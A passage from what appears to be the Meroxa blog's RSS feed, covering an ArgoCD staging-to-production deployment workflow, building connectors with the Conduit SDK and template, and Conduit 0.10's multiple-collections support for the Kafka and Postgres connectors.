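    path: deploy/staging      # per-environment chart directory
    targetRevision: HEAD      # always track the latest commit on the default branch
    helm:
      valueFiles:
        - values-images.yaml  # pinned image tag lives here
  destination:
    server: https://kubernetes.default.svc
    namespace: tenant-acme
  syncPolicy:
    automated: {}
```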
&lt;p&gt;Once the synchronization process runs, the ArgoCD controller will be responsible for reconciling the desired state from the helm chart into the actual state of Kubernetes resources - including the Conduit Platform’s &lt;code class=&quot;language-text&quot;&gt;Pod&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Deployment&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;Ingress&lt;/code&gt;. For more information on the sync process in ArgoCD, check out &lt;a href=&quot;https://argo-cd.readthedocs.io/en/stable/core_concepts/&quot;&gt;the documentation here&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;PR → Staging → Production&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Our deployment workflow is designed to keep the deployment process reliable and efficient. Here’s how we navigate from staging to production using ArgoCD:&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Staging CI Workflow&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The journey begins when a PR is merged into the main branch, triggering our staging CI GitHub workflow. This builds a new Docker image and opens an automated PR that updates the &lt;code class=&quot;language-text&quot;&gt;values-images.yaml&lt;/code&gt; files in the &lt;code class=&quot;language-text&quot;&gt;staging/&lt;/code&gt; directory to point to it.&lt;/p&gt;
&lt;p&gt;Example &lt;code class=&quot;language-text&quot;&gt;values-images.yaml&lt;/code&gt; file, containing a Docker image tag for the Conduit platform:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;imageTag&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; av8344892b23h281h5c50e863a93c2b231hd8ce3&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;&lt;strong&gt;Production CI Workflow&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The production workflow mostly follows the staging process, but with two key differences:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Promote The Staging Chart + Docker Image:&lt;/strong&gt; Instead of building a new image for production, the production workflow promotes the changes from the &lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;staging/&lt;/code&gt;&lt;/strong&gt; directory to the &lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;production/&lt;/code&gt;&lt;/strong&gt; directory.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Manual PR Approval for Production&lt;/strong&gt;: Unlike staging, the PR for production deployment requires manual approval. This step ensures an extra layer of scrutiny and control before changes impact our production environment.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;mermaid&quot;&gt;&lt;pre class=&quot;language-mermaid&quot;&gt;&lt;code class=&quot;language-mermaid&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;gitGraph&lt;/span&gt; LR&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
     checkout main
     commit
     commit
     branch samir/add-new-migration
     commit id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;samir adds new migration&quot;&lt;/span&gt;
     checkout main
     merge samir/add-new-migration id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;1j38h72&quot;&lt;/span&gt;
     branch automated-value-files-updates-1j38h72
     commit id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;[Automated] update staging directory values files to &apos;1j38h72&apos;&quot;&lt;/span&gt;
     checkout main
     merge automated-value-files-updates-1j38h72 id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;j81h78t&quot;&lt;/span&gt;
     branch automated-value-files-updates-prod-1j38h72
     commit id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;[Automated] update production directory values files to &apos;1j38h72&apos;&quot;&lt;/span&gt;
     checkout main
     merge automated-value-files-updates-prod-1j38h72&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Challenges and Learnings&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Adopting ArgoCD came with a bit of a learning curve. Here are some challenges we faced and the insights we gained:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Managing Image Tags and PRs&lt;/strong&gt;: Initially, pinning image tags with environment-specific deployments was tricky. We learned to simply point &lt;code class=&quot;language-text&quot;&gt;targetRevision&lt;/code&gt; to &lt;code class=&quot;language-text&quot;&gt;HEAD&lt;/code&gt;, and duplicate charts per environment in different directories. Here are the alternatives we avoided:&lt;/li&gt;
&lt;li&gt;At first, we were inclined to point &lt;code class=&quot;language-text&quot;&gt;targetRevision&lt;/code&gt;s directly at specific commits, but this quickly proved problematic: changes to Helm charts and values could bypass staging and land directly in production.&lt;/li&gt;
&lt;li&gt;We also explored tracking separate &lt;code class=&quot;language-text&quot;&gt;staging&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;production&lt;/code&gt; branches, but decided against it to reduce complexity and potential conflicts.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated PR Management&lt;/strong&gt;: Automated PRs, especially for production, create a lot of noise and can quickly pile up if the team is not paying attention to them. This is a drawback of the approach, but we decided the deployment simplicity was worth the tradeoff.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;File Protection&lt;/strong&gt;: We implemented PR checks that protect &lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;values-images.yaml&lt;/code&gt;&lt;/strong&gt; files and Helm charts in the staging and production directories from manual alterations, preserving the integrity of the deployment process.&lt;/li&gt;
&lt;/ul&gt;
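&lt;p&gt;To make the setup above concrete, here is a minimal sketch of an ArgoCD &lt;code class=&quot;language-text&quot;&gt;Application&lt;/code&gt; manifest with &lt;code class=&quot;language-text&quot;&gt;targetRevision&lt;/code&gt; pointed at &lt;code class=&quot;language-text&quot;&gt;HEAD&lt;/code&gt; and a per-environment chart directory. The repository URL, paths, and names below are illustrative, not our actual layout:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: my-service-staging        # illustrative name
  namespace: argocd
spec:
  project: default
  source:
    repoURL: https://github.com/example-org/deployments.git  # hypothetical repo
    targetRevision: HEAD          # track the tip of the default branch
    path: staging/my-service      # chart duplicated per environment directory
    helm:
      valueFiles:
        - values-images.yaml      # image tags bumped by the automated PRs
  destination:
    server: https://kubernetes.default.svc
    namespace: my-service
  syncPolicy:
    automated: {}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;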
&lt;h2&gt;&lt;strong&gt;Future Improvements&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Looking forward, we aim to improve our ArgoCD setup:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Slack Notifications&lt;/strong&gt;: To enhance our monitoring, we&apos;re considering integrating Slack notifications to alert the team when syncs in Staging and Production are complete.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Multi-Cluster Capabilities&lt;/strong&gt;: Utilizing ArgoCD&apos;s multi-cluster feature could be useful, especially for managing multiple production clusters in different regions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scaling ArgoCD Controllers&lt;/strong&gt;: To improve reliability, we’re working on scaling up the number of ArgoCD controllers so that deployments can tolerate pod failures.
&lt;p&gt;ArgoCD has been a game-changer for us at Meroxa. It has streamlined our deployment process, making it more efficient and scalable. We&apos;re excited to dive deeper into ArgoCD and fully leverage its capabilities.&lt;/p&gt;
&lt;p&gt;Have you thought about deploying applications with ArgoCD? Are you working on stream processing or data engineering problems? Join &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;our community&lt;/a&gt; and chat with us.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Simplifying Data Integration: Unleashing the Power of Conduit SDK and Connector Template]]></title><description><![CDATA[Explore the power of Conduit to create custom connectors tailored to your specific data integration needs. Learn how to use the Conduit SDK for enhanced data management and discover a world of possibilities in streamlining your data workflows. Start building your custom connector today!]]></description><link>https://meroxa.com/blog/crafting-custom-conduit-connectors-with-ease-a-step-by-step-guide</link><guid isPermaLink="false">https://meroxa.com/blog/crafting-custom-conduit-connectors-with-ease-a-step-by-step-guide</guid><dc:creator><![CDATA[William Hill]]></dc:creator><pubDate>Wed, 08 May 2024 16:22:50 GMT</pubDate><content:encoded>&lt;h3&gt;Introducing Conduit SDK&lt;/h3&gt;
&lt;p&gt;Conduit&apos;s SDK is designed to facilitate the creation of connectors in any programming language that supports gRPC, with a particular emphasis on Go. This SDK simplifies the process of building connectors, offering developers the tools necessary to integrate seamlessly with Conduit’s data streaming platform.&lt;/p&gt;
&lt;h3&gt;Leveraging the Conduit Connector Template&lt;/h3&gt;
&lt;p&gt;For those looking to jumpstart the development of a Conduit connector, the Conduit Connector Template is an invaluable resource. This template provides a foundational project structure, complete with essential utilities like GitHub Actions for CI/CD processes and a Makefile for routine tasks. It includes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Skeleton code for the connector&apos;s configuration, source, and destination&lt;/li&gt;
&lt;li&gt;Example unit tests&lt;/li&gt;
&lt;li&gt;A &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/Makefile&quot;&gt;Makefile&lt;/a&gt; with commonly used targets&lt;/li&gt;
&lt;li&gt;A GitHub workflow to &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/.github/workflows/build.yml&quot;&gt;build the code and run the tests&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;A GitHub workflow to &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/.github/workflows/lint.yml&quot;&gt;run a pre-configured set of linters&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;A GitHub workflow which &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/.github/workflows/release.yml&quot;&gt;automatically creates a release&lt;/a&gt; once a tag is pushed&lt;/li&gt;
&lt;li&gt;A &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/.github/dependabot.yml&quot;&gt;dependabot setup&lt;/a&gt; which checks your dependencies for available updates and &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/.github/workflows/dependabot-auto-merge-go.yml&quot;&gt;merges minor version upgrades&lt;/a&gt; automatically&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/.github/ISSUE_TEMPLATE&quot;&gt;Issue&lt;/a&gt; and &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/.github/pull_request_template.md&quot;&gt;PR templates&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;A &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-template/blob/main/README_TEMPLATE.md&quot;&gt;README template&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Developing Your Connector&lt;/h3&gt;
&lt;p&gt;Whether creating a source or destination connector, Conduit’s tools support you every step of the way. The process involves:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Cloning the template and setting up the initial configuration.&lt;/li&gt;
&lt;li&gt;Customizing the source and destination logic to fit your specific data integration needs.&lt;/li&gt;
&lt;li&gt;Utilizing the &lt;code class=&quot;language-text&quot;&gt;paramgen&lt;/code&gt; tool to generate configuration parameter mappings automatically.&lt;/li&gt;
&lt;/ul&gt;
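&lt;p&gt;To illustrate the last step: &lt;code class=&quot;language-text&quot;&gt;paramgen&lt;/code&gt; generates parameter definitions from a plain Go configuration struct. The sketch below hand-rolls the kind of parsing and validation that the generated code and the SDK handle for you; the struct, field names, and defaults are hypothetical and not part of the actual SDK API:&lt;/p&gt;

```go
package main

import (
	"errors"
	"fmt"
)

// SourceConfig is a hypothetical connector configuration.
// With the real SDK, paramgen derives parameter specs
// (names, defaults, required flags) from a struct like this.
type SourceConfig struct {
	URL             string // connection string; required
	PollingInterval string // optional; has a default
}

// parseConfig mimics what the generated code does: read raw
// settings, apply defaults, and validate required fields.
func parseConfig(settings map[string]string) (SourceConfig, error) {
	cfg := SourceConfig{PollingInterval: "1s"} // default value
	if v, ok := settings["url"]; ok {
		cfg.URL = v
	}
	if v, ok := settings["pollingInterval"]; ok {
		cfg.PollingInterval = v
	}
	if cfg.URL == "" {
		return SourceConfig{}, errors.New("required parameter missing: url")
	}
	return cfg, nil
}

func main() {
	cfg, err := parseConfig(map[string]string{"url": "postgres://localhost/db"})
	fmt.Println(cfg.URL, cfg.PollingInterval, err)
}
```

&lt;p&gt;In practice the template wires this plumbing up for you, so you mostly fill in the struct and run &lt;code class=&quot;language-text&quot;&gt;paramgen&lt;/code&gt;.&lt;/p&gt;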
&lt;h3&gt;Practical Steps to Implementation&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Initialization&lt;/strong&gt;: Start by using the template directly from GitHub to ensure all configurations are set.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Customization&lt;/strong&gt;: Adapt the provided skeleton code to meet the specific requirements of your data source or destination.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Testing and Deployment&lt;/strong&gt;: Utilize the built-in testing framework and CI/CD pipelines to ensure your connector is robust and ready for deployment.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;By integrating Conduit’s SDK and leveraging the provided templates, developers can significantly reduce the complexity and time required to bring a functional data connector to life.&lt;/p&gt;
&lt;p&gt;For those interested in diving deeper into the capabilities of &lt;a href=&quot;https://conduit.io/docs/connectors/building-connectors/conduit-sdk&quot;&gt;Conduit SDK&lt;/a&gt; and how you can efficiently build and deploy your own connectors, &lt;a href=&quot;https://github.com/ConduitIO&quot;&gt;read the full documentation here&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit 0.10 comes with Multiple collections support]]></title><description><![CDATA[Explore the new features and enhancements in Conduit version 0.10, designed to streamline your data integration processes. Discover how our latest update can help improve efficiency, security, and performance for your data operations. Upgrade today and transform how you manage data with Conduit 0.10]]></description><link>https://meroxa.com/blog/conduit-0.10-comes-with-multiple-collections-support</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-0.10-comes-with-multiple-collections-support</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Mon, 29 Apr 2024 22:37:15 GMT</pubDate><content:encoded>&lt;p&gt;We’re happy to announce another release of our open-source data integration tool Conduit: &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.10.0&quot;&gt;0.10&lt;/a&gt;. This one comes only a month after our last release. We thought the new native support for multiple collections was so important that we wanted to release it to our users as quickly as possible.&lt;/p&gt;
&lt;h2&gt;Multiple collections support&lt;/h2&gt;
&lt;p&gt;We take our users&apos; feedback very seriously, and something we kept hearing was the need to have the ability to connect and integrate multiple data collections simultaneously. While this could be accomplished in some cases by creating multiple pipelines, it was far from ideal and not very scalable.&lt;/p&gt;
&lt;p&gt;What do we mean by “collections”? It depends on the resource that Conduit is interacting with. In a database, a collection is a table; in Kafka, it’s a topic; in Elasticsearch, it’s an index. We use “collection” as the catch-all term for structures that contain a group of related records.&lt;/p&gt;
&lt;p&gt;With this latest release, we believe it will be easier for connector developers to expand their functionality and add support for multiple collections.&lt;/p&gt;
&lt;p&gt;To facilitate connectivity between connectors, we included a new metadata field named &lt;a href=&quot;https://conduit.io/docs/features/opencdc-record#opencdccollection&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;opencdc.collection&lt;/code&gt;&lt;/a&gt; to indicate the collection from which a record originated. For example, if a record was read from a topic named &lt;code class=&quot;language-text&quot;&gt;users&lt;/code&gt;, the &lt;a href=&quot;https://conduit.io/docs/features/opencdc-record&quot;&gt;OpenCDC&lt;/a&gt; record would look like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;json&quot;&gt;&lt;pre class=&quot;language-json&quot;&gt;&lt;code class=&quot;language-json&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;operation&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;create&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;metadata&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;opencdc.collection&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;users&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;opencdc.readAt&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1663858188836816000&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;opencdc.version&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;conduit.source.plugin.name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;builtin:kafka&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;conduit.source.plugin.version&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v0.8.0&quot;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  ...
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The goal of this feature is to make it easy to route records in a pipeline. What in the past would have taken several pipelines, can now be a single pipeline. However, that’s not the only way to route records in Conduit. Read more about other ways to &lt;a href=&quot;https://conduit.io/docs/features/record-routing/&quot;&gt;route records in Conduit&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Connectors with support for multiple collections&lt;/h2&gt;
&lt;p&gt;To demonstrate the capability of having multiple collections in Conduit, we decided to start with some of our built-in connectors, which are included as part of the Conduit binary.&lt;/p&gt;
&lt;h3&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-kafka&quot;&gt;Kafka connector&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;This connector now supports the ability to read and write to multiple topics. When configuring &lt;strong&gt;Kafka as a source&lt;/strong&gt;, you can make use of the &lt;code class=&quot;language-text&quot;&gt;topics&lt;/code&gt; configuration option to include a list of Kafka topics from which records will be read:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; kafka&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;kafka
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Read records from topic1 and topic2&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;topics&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; topic1&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;topic2
      &lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When configuring &lt;strong&gt;Kafka as a destination&lt;/strong&gt;, you can specify a target topic based on data taken from the record being processed. The default value of the &lt;code class=&quot;language-text&quot;&gt;topic&lt;/code&gt; parameter is the &lt;a href=&quot;https://pkg.go.dev/text/template&quot;&gt;Go template&lt;/a&gt; &lt;code class=&quot;language-text&quot;&gt;{{ index .Metadata &quot;opencdc.collection&quot; }}&lt;/code&gt;, which means that records will be routed to the topic based on the collection they come from. You can change the parameter to take data from a different field or use a static topic.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; kafka&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;destination
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;kafka
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Route record to topic based on record metadata field &quot;opencdc.collection&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;topic&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;{{ index .Metadata &quot;opencdc.collection&quot; }}&apos;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-postgres&quot;&gt;Postgres connector&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;When configuring a Postgres connector as a source, we expanded support to read from multiple tables in both CDC modes (logical replication and long polling). Use the &lt;code class=&quot;language-text&quot;&gt;tables&lt;/code&gt; configuration option to list the tables you would like to read from, comma-separated.&lt;/p&gt;
&lt;p&gt;Additionally, we have also added the ability to read all tables from a public schema using a wildcard option (*). We believe this option will come in handy in the following situations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Initial data ingestion:&lt;/strong&gt; this way you’ll ensure the connector will capture all available tables, reducing the setup time and ensuring no tables are missed.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Schema changes:&lt;/strong&gt; if new tables are added, the connector will automatically pick them up, eliminating the need for manual updates.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data discovery:&lt;/strong&gt; detecting changes across all tables can be helpful when exploring a new data source.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reducing maintenance:&lt;/strong&gt; the need to maintain a list of specific tables is eliminated, making the connector easier to maintain.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here’s an example of a pipeline configuration file using &lt;strong&gt;Postgres as a source:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; pg&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;tables&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;*&quot;&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;# All tables in schema &apos;public&apos;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgresql://user:password@localhost:5432/exampledb&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As with our &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-kafka&quot;&gt;Kafka connector&lt;/a&gt;, the &lt;strong&gt;Postgres destination&lt;/strong&gt; defaults to setting the destination table to the value of the &lt;code class=&quot;language-text&quot;&gt;opencdc.collection&lt;/code&gt; metadata field. This can be customized if you need to. Here’s an example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; pg&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;destination
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Route record to table based on record metadata field &quot;opencdc.collection&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;{{ index .Metadata &quot;opencdc.collection&quot; }}&apos;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgresql://user:password@localhost:5432/exampledb&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;Generator connector&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Multiple collections support enables the generator to emit records with different formats. For example, let’s assume we want to simulate reading from two collections: one contains data about users, the other data about orders. With the generator, that can be accomplished using the following configuration:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
